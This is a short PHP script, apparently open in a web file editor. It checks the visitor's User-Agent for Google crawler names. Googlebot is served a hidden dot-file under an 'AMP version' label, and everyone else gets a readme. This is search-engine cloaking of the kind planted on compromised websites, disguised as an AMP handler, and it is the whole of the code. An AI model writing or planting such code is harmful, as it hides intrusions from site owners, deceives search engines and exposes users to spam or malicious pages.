返回
<?php function isGoogleBot() { if (empty($_SERVER['HTTP_USER_AGENT'])) { return false; } $googleBots = array( 'Googlebot', 'Google-Site-Verification', 'Google-InspectionTool', 'Googlebot-Mobile', 'Googlebot-News' ); $userAgent = $_SERVER['HTTP_USER_AGENT']; foreach ($googleBots as $bot) { if (stripos($userAgent, $bot) !== false) { return true; } } return false; } if (isGoogleBot()) { $ampFile = __DIR__ . '/.index.php'; if (is_file($ampFile) && is_readable($ampFile)) { include $ampFile; } else { http_response_code(500); echo 'Error: AMP version not available.'; } exit; } include __DIR__ . '/readme.txt'; exit; ?>
保存